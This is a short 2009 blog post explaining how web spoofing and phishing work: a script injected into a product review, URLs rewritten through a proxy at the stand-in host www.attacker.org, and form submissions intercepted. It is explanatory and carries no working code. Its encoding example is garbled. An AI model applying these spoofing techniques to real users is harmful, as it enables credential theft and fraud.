Sunday, November 1, 2009

How the Web Spoofing Attack Works

URL Rewriting

STEP I
# A Phisher could insert a malicious script inside a product review to attack the user.

# The Script would modify the host site so that the user believes he/she is interacting with secure site. this technique is also called as “Cross-Scripting.”

STEP II
# This done by using encoded characters to hide the destination address of a link.
Ex-“abc” = "abc”

# Assuming the attacker’s server is on the machine www.attacker.org, the attacker rewrites a URL by adding http://www.attacker.org to the front of the URL by use of
JAVA Script.
For example,
http://home.netscape.com becomes http://www.attacker.org/http://home.netscape.com.

STEP III
# Once the attacker’s server has fetched the real document needed to satisfy the request, the attacker rewrites all of the URLs in the document. Then the attacker’s server provides the rewritten page to the victim’s browser.

# If the victim follows a link on the new page, the victim remains trapped in the attacker’s false web.

Forms 

When the victim submits a form, the submitted data goes to the attacker’s server. The attacker’s server can observe and even modify the submitted data, doing whatever malicious editing desired, before passing it on to the real server.

1. A deceptive message is sent from the phisher to the user.
2. A user provides confidential information to a phishing server (normally after some interaction with the server).
3. The phisher obtains the confidential information from the server.
4. The confidential information is used to impersonate the user.
5. The phisher obtains illicit monetary gain.

No comments:

Post a Comment